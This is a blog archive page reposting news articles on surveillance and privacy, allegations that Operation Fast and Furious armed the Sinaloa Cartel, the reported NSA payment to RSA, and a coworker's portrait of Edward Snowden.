Mike Rispoli, a spokesman for Privacy International, echoed those sentiments, but added that there needs to be more pressure on government to stop them from snooping on the private lives of ordinary people.

‘It is critical that people use all technology at their disposal to keep their communications private and secure,’ he said.

‘We should all support the creation and widespread use of these tools. Ultimately, however, people should never have to do more or go to extra lengths to protect their rights.

‘This is why we need political, legal, as well as technological, solutions to ensure that our privacy rights are protected.

‘While people can use technology to empower themselves, we must also challenge the policies of Government and intelligence agencies to end the unlawful mass surveillance of people around the world.’

By DAMIEN GAYLE

via Dailymail.co.uk

High-Ranking Mexican Drug Cartel Member makes Explosive Allegation: ‘Fast and Furious is not what you think it is’

Apr 9, 2014 | 2020 Relevant, Events & Assassinations, Leaks, News

The Blaze A high-ranking Mexican drug cartel operative currently in U.S. custody is making startling allegations that the failed federal gun-walking operation known as “Fast and Furious” isn’t what you think it is.

It wasn’t about tracking guns, it was about supplying them — all part of an elaborate agreement between the U.S. government and Mexico’s powerful Sinaloa Cartel to take down rival cartels.

The explosive allegations are being made by Jesus Vicente Zambada-Niebla, known as the Sinaloa Cartel’s “logistics coordinator.” He was extradited to the Chicago last year to face federal drug charges.

Zambada-Niebla claims that under a “divide and conquer” strategy, the U.S. helped finance and arm the Sinaloa Cartel through Operation Fast and Furious in exchange for information that allowed the DEA, U.S. Immigration and Customs Enforcement (ICE) and other federal agencies to take down rival drug cartels. The Sinaloa Cartel was allegedly permitted to traffic massive amounts of drugs across the U.S. border from 2004 to 2009 — during both Fast and Furious and Bush-era gunrunning operations — as long as the intel kept coming.

This pending court case against Zambada-Niebla is being closely monitored by some members of Congress, who expect potential legal ramifications if any of his claims are substantiated. The trial was delayed but is now scheduled to begin on Oct. 9.

Zambada-Niebla is reportedly a close associate of Sinaloa Cartel kingpin Joaquin “El Chapo” Guzman and the son of Ismael “Mayo” Zambada-Garcia, both of which remain fugitives, likely because of the deal made with the DEA, federal court documents allege.

Based on the alleged agreement ”the Sinaloa Cartel under the leadership of defendant’s father, Ismael Zambada-Niebla and ‘Chapo’ Guzman, were given carte blanche to continue to smuggle tons of illicit drugs into Chicago and the rest of the United States and were also protected by the United States government from arrest and prosecution in return for providing information against rival cartels which helped Mexican and United States authorities capture or kill thousands of rival cartel members,” states a motion for discovery filed in U.S. District Court by Zambada-Niebla’s attorney in July 2011.

A source in Congress, who spoke to TheBlaze on the condition of anonymity, said that some top congressional investigators have been keeping “one eye on the case.” Another two members of Congress, both lead Fast and Furious Congressional investigators, told TheBlaze they had never even heard of the case.

One of the Congressmen, who also spoke to TheBlaze on the condition of anonymity because criminal proceedings are still ongoing, called the allegations “disturbing.” He said Congress will likely get involved once Zambada-Niebla’s trial has concluded if any compelling information surfaces.

“Congress won’t get involved in really any criminal case until the trial is over and the smoke has cleared,” he added. “If the allegations prove to hold any truth, there will be some serious legal ramifications.”

Earlier this month, two men in Texas were sentenced to 70 and 80 months in prison after pleading guilty to attempting to export 147 assault rifles and thousands of rounds of ammunition to Mexico’s Los Zetas cartel. Compare that to the roughly 2,000 firearms reportedly “walked” in Fast and Furious, which were used in the murders of hundreds of Mexican citizens and U.S. Border Agent Brian Terry, and some U.S. officials could potentially face jail time if they knowingly armed the Sinaloa Cartel and allowed guns to cross into Mexico.

If proven in court, such an agreement between U.S. law enforcement agencies and a Mexican cartel could potentially mar both the Bush and Obama administrations. The federal government is denying all of Zambada-Niebla’s allegations and contend that no official immunity deal was agreed upon.

To be sure, Zambada-Niebla is a member of one of the most ruthless drug gangs in all of Mexico, so there is a chance that he is saying whatever it takes to reduce his sentence, which will likely be hefty. However, Congress and the media have a duty to prove without a reasonable doubt that there is no truth in his allegations. So far, that has not been achieved.

Zambada-Niebla was reportedly responsible for coordinating all of the Sinaloa Cartel’s multi-ton drug shipments from Central and South American countries, through Mexico, and into the United States. To accomplish this, he used every tool at his disposal: Boeing 747 cargo planes, narco-submarines, container ships, speed boats, fishing vessels, buses, rail cars, tractor trailers and automobiles. But Guzman and Zambada-Niebla’s overwhelming success within the Sinaloa Cartel was largely due to the arrests and dismantling of many of their competitors and their booming businesses in the U.S. from 2004 to 2009 — around the same time ATF’s gun-walking operations were in full swing. Fast and Furious reportedly began in 2009 and continued into early 2011.

According Zambada-Niebla, that was a product of the collusion between the U.S. government and the Sinaloa Cartel.

Soldiers and police officers guard packages of seized marijuana during a presentation for the media in Tijuana, Mexico. (AP Photo/Guillermo Arias)

The claims seem to fall in line with statements made last month by Guillermo Terrazas Villanueva, a spokesman for the Chihuahua state government in northern Mexico who said U.S. agencies ”don’t fight drug traffickers,“ instead ”they try to manage the drug trade.”

Also, U.S. officials have previously acknowledged working with the Sinaloa Cartel through another informant, Humberto Loya-Castro. He is also allegedly a high-ranking member of the Sinaloa Cartel as well as a close confidant and lawyer of “El Chapo” Guzman.

Loya-Castro was indicted along with Chapo and Mayo in 1995 in the Southern District of California in a massive narcotics trafficking conspiracy (Case no. 95CR0973). The case was dismissed in 2008 at the request of prosecutors after Loya became an informant for the United States government and subsequently provided information for years.

In 2005, “the CS (informant Loya-Castro) signed a cooperation agreement with the United States Attorney’s Office for the Southern District of California,” states an affidavit filed in the Zambada-Niebla case by Loya-Castro’s handler, DEA agent Manuel Castanon.

“Thereafter, I began to work with the CS. Over the years, the CS’ cooperation resulted in the seizure of several significant loads of narcotics and precursor chemicals. The CS’ cooperation also resulted in other real-time intelligence that was very useful to the United States government.”

Under the alleged agreement with U.S. agencies, “the Sinaloa Cartel, through Loya-Castro, was to provide information accumulated by Mayo, Chapo, and others, against rival Mexican Drug Trafficking Organizations to the United States government,” a motion for discovery states.

In return, the United States government allegedly agreed to dismiss the charges in the pending case against Loya-Castro (which they did), not to interfere with his drug trafficking activities and those of the Sinaloa Cartel and not actively prosecute him or the Sinaloa Cartel leadership.

Taken directly from the motion filed in federal court:

“This strategy, which he calls ‘Divide & Conquer,’ using one drug organization to help against others, is exactly what the Justice Department and its various agencies have implemented in Mexico. In this case, they entered into an agreement with the leadership of the Sinaloa Cartel through, among others, Humberto Loya-Castro, to receive their help in the United States government’s efforts to destroy other cartels.”

“Indeed, United States government agents aided the leaders of the Sinaloa Cartel.”

The government has denied this and says the deal did not go past Loya-Castro.

Zambada-Niebla was arrested by Mexican soldiers in late March of 2009 after he met with DEA agents at a Mexico City hotel in a meeting arranged by Loya-Castro, though the U.S. government was not involved in his arrest. He was extradited to Chicago to face federal drug charges on Feb. 18, 2010. He is now being held in a Michigan prison after requesting to be moved from Chicago.

“Classified Materials”

During his initial court proceedings, Zambada-Niebla continually stated that he was granted full immunity by the DEA in exchange for his cooperation. The agency, however, argues that an “official” immunity deal was never established though they admit he may have acted as an informant.

Zambada-Niebla and his legal council also requested records about Operation Fast and Furious, which permitted weapons purchased in the United States to be illegally smuggled into Mexico, sometimes by paid U.S. informants and cartel leaders. Their request was denied. From the defense motion:

“It is estimated that approximately 3,000 people were killed in Mexico as a result of ‘Operation Fast and Furious,’ including law enforcement officers in the state of Sinaloa, Mexico, the headquarters of the Sinaloa cartel. The Department of Justice’s leadership apparently saw this as an ingenious way of combating drug cartel activities.”

“It has recently been disclosed that in addition to the above-referenced problems with ‘Operation Fast & Furious,’ the DOJ, DEA, and the FBI knew that some of the people who were receiving the weapons that were being allowed to be transported to Mexico, were in fact informants working for those organizations and included some of the leaders of the cartels.”

Zambada’s attorney has filed several motions for discovery to that effect in Illinois Federal District Court, which were summarily denied by the presiding judge who claimed the defendant failed to make the case that he was actually a DEA informant.

In April, 2012, a federal judge refused to dismiss charges against him.

From a Chicago Sun Times report: “According to the government, [Zambada-Niebla] conveyed his interest and willingness to cooperate with the U.S. government, but the DEA agents told him they ‘were not authorized to meet with him, much less have substantive discussions with him,’” the judge wrote.

In this courtroom artist’s drawing Jesus Vincente Zambada-Niebla appears before U.S. District Judge Ruben Castillo Tuesday, Feb. 23, 2010, in Chicago. (AP Photo/Verna Sadock)

In their official response to Zambada-Niebla’s motion for discovery, the federal government confirmed the existence of “classified materials” regarding the case but argued they “do not support the defendant’s claim that he was promised immunity or public authority for his actions.”

Experts have expressed doubts that Zambada-Niebla had an official agreement with the U.S. government, however, agree Loya Castro probably did. Either way, the defense still wants to obtain DEA reports that detail the agency’s relationship with the Sinaloa Cartel and put the agents on the stand, under oath to testify.

The documents that detail the relationship between the federal government and the Sinaloa Cartel have still not been released or subjected to review — citing matters of national security.

via

Bribe or ‘Tax’? NSA gives 10milion to RSA for Backdoor Access

Dec 21, 2013 | Abuses of Power, Leaks, News

Hmm. Hold up. So if we go by this Wikipedia entry..

“Founded as an independent company in 1982, RSA Security, Inc. was acquired by EMC Corporation in 2006 for US$ 2.1 billion and operates as a division within EMC.^[5]”

People need to understand, this means RSA took around 2% of what they’d make in one year. FOR A BACK-DOOR OMG. Does this not sound more like a tax, than a payment (never mind a bribe!)? How much would you care about an extra 2% per year? Exactly. Thats all I got. Someone else needs to close that gap. -Max

What’s an encryption backdoor cost? When you’re the NSA, apparently the fee is $10 million.

Intentional flaws created by the National Security Agency in RSA’s encryption tokens werediscovered in September, thanks to documents released by whistleblower Edward Snowden. It has now been revealed that RSA was paid $10 million by the NSA to implement those backdoors, according to a new report in Reuters.

Two people familiar with RSA’s BSafe software told Reuters that the company had received the money in exchange for making the NSA’s cryptographic formula as the default for encrypted key generation in BSafe.

“Now we know that RSA was bribed,” said security expert Bruce Schneier, who has been involved in the Snowden document analysis. “I sure as hell wouldn’t trust them. And then they made the statement that they put customer security first,” he said.

RSA, now owned by computer storage firm EMC Corp, has a long history of entanglement with the government. In the 1990s, the company was instrumental in stopping a government plan to include a chip in computers that would’ve allowed the government to spy on people.

It has also had its algorithms hacked before, as has RSA-connected VeriSign.

The new revelation is important, Schneier said, because it confirms more suspected tactics that the NSA employs.

“You think they only bribed one company in the history of their operations? What’s at play here is that we don’t know who’s involved,” he said.

Other companies that build widely-used encryption apparatus include Symantec, McAfee, and Microsoft. “You have no idea who else was bribed, so you don’t know who else you can trust,” Schneier said.

RSA did not return a request for comment, and did not comment for the Reuters story.

via CNet

An NSA Coworker Remembers The Real Edward Snowden: ‘A Genius Among Geniuses’

Dec 16, 2013 | Government Agenda, Leaks, News

Perhaps Edward Snowden’s hoodie should have raised suspicions.

The black sweatshirt sold by the civil libertarian Electronic Frontier Foundation featured a parody of the National Security Agency’s logo, with the traditional key in an eagle’s claws replaced by a collection of AT&T cables, and eavesdropping headphones covering the menacing bird’s ears. Snowden wore it regularly to stay warm in the air-conditioned underground NSA Hawaii Kunia facility known as “the tunnel.”

His coworkers assumed it was meant ironically. And a geek as gifted as Snowden could get away with a few irregularities.

Months after Snowden leaked tens of thousands of the NSA’s most highly classified documents to the media, the former intelligence contractor has stayed out of the limelight, rarely granting interviews or sharing personal details. A 60 Minutes episode Sunday night, meanwhile, aired NSA’s officials descriptions of Snowden as a malicious hacker who cheated on an NSA entrance exam and whose work computers had to be destroyed after his departure for fear he had infected them with malware.

But an NSA staffer who contacted me last month and asked not to be identified–and whose claims we checked with Snowden himself via his ACLU lawyer Ben Wizner—offered me a very different, firsthand portrait of how Snowden was seen by his colleagues in the agency’s Hawaii office: A principled and ultra-competent, if somewhat eccentric employee, and one who earned the access used to pull off his leak by impressing superiors with sheer talent.

The anonymous NSA staffer’s priority in contacting me, in fact, was to refute stories that have surfaced as the NSA and the media attempt to explain how a contractor was able to obtain and leak the tens of thousands of highly classified documents that have become the biggest public disclosure of NSA secrets in history. According to the source, Snowden didn’t dupe coworkers into handing over their passwords, as one report has claimed. Nor did Snowden fabricate SSH keys to gain unauthorized access, he or she says.

Instead, there’s little mystery as to how Snowden gained his access: It was given to him.

“That kid was a genius among geniuses,” says the NSA staffer. “NSA is full of smart people, but anybody who sat in a meeting with Ed will tell you he was in a class of his own…I’ve never seen anything like it.”

When I reached out to the NSA’s public affairs office, a spokesperson declined to comment, citing the agency’s ongoing investigation into Snowden’s leaks.

But over the course of my communications with the NSA staffer, Snowden’s former colleague offered details that shed light on both how Snowden was able to obtain the NSA’s most secret files, as well as the elusive 30-year old’s character:

Before coming to NSA Hawaii, Snowden had impressed NSA officials by developing a backup system that the NSA had widely implemented in its codebreaking operations.
He also frequently reported security vulnerabilities in NSA software. Many of the bugs were never patched.
Snowden had been brought to Hawaii as a cybersecurity expert working for Dell’s services division but due to a problem with the contract was reassigned to become an administrator for the Microsoft intranet management system known as Sharepoint. Impressed with his technical abilities, Snowden’s managers decided that he was the most qualified candidate to build a new web front-end for one of its projects, despite his contractor status. As his coworker tells it, he was given full administrator privileges, with virtually unlimited access to NSA data. “Big mistake in hindsight,” says Snowden’s former colleague. “But if you had a guy who could do things nobody else could, and the only problem was that his badge was green instead of blue, what would you do?”
As further evidence that Snowden didn’t hijack his colleagues’ accounts for his leak, the NSA staffer points to an occasion when Snowden was given a manager’s password so that he could cover for him while he was on vacation. Even then, investigators found no evidence Snowden had misused that staffer’s privileges, and the source says nothing he could have uniquely accessed from the account has shown up in news reports.
Snowden’s superiors were so impressed with his skills that he was at one point offered a position on the elite team of NSA hackers known as Tailored Access Operations. He unexpectedly turned it down and instead joined Booz Allen to work at NSA’s Threat Operation Center.
Another hint of his whistleblower conscience, aside from the telltale hoodie: Snowden kept a copy of the constitution on his desk to cite when arguing against NSA activities he thought might violate it.
The source tells me Snowden also once nearly lost his job standing up for a coworker who was being disciplined by a superior.
Snowden often left small, gifts anonymously at colleagues’ desks.
He frequently walked NSA’s halls carrying a Rubik’s cube–the same object he held to identify himself on a Hong Kong street to the journalists who first met with him to publish his leaks.
Snowden’s former colleague says that he or she has slowly come to understand Snowden’s decision to leak the NSA’s files. “I was shocked and betrayed when I first learned the news, but as more time passes I’m inclined to believe he really is trying to do the right thing and it’s not out of character for him. I don’t agree with his methods, but I understand why he did it,” he or she says. “I won’t call him a hero, but he’s sure as hell no traitor.”

via Forbes.com

« Older Entries